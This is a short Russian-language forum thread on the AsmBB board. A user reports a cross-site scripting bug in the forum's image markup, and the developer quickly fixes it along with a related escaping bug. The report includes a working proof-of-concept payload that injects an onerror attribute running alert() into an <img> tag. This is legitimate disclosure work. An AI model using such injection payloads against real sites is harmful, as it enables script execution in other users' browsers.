AsmBB

Power
Login Register

XSS - Внедрение произвольного атрибута в <img>
0

#15297 (ツ) xmdsv
Created 13.01.2017, read: 7013 times

Вот XSS:

[![onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]] 

Результат:

<img class="txt" src="[x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]" alt="!<a href="x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//">x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//</a>" />

:)[x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]

#15301 (ツ) johnfound
Created 12.01.2017, read: 6978 times

Ого! Спасибо!

#15310 (ツ) johnfound
Created 13.01.2017, read: 6865 times

Теперь должно быть в порядке.

#15311 (ツ) xmdsv
Created 13.01.2017, read: 6856 times
#15312 (ツ) johnfound
Created 13.01.2017, read: 6853 times
#15313 (ツ) xmdsv
Created 13.01.2017, read: 6851 times
#15314 (ツ) johnfound
Created 13.01.2017, read: 6845 times
xmdsv

Отсутствует екранизация спец-символов в отображаемом параметре s.

Спасибо. Исправлено.

#15315 (ツ) xmdsv
Created 13.01.2017, read: 6842 times
johnfound

Спасибо. Исправлено.

Ого, как быстро :)

#15316 (ツ) johnfound
Created 13.01.2017, read: 6838 times
xmdsv

Ого, как быстро :)

Потому что ассемблер – язык простой. ;)

XSS - Внедрение произвольного атрибута в <img>
0

AsmBB v3.0 (check-in: a316dab8b98d07d9); SQLite v3.42.0 (check-in: 831d0fb2836b71c9);
©2016..2023 John Found; Licensed under EUPL. Powered by Assembly language Created with Fresh IDE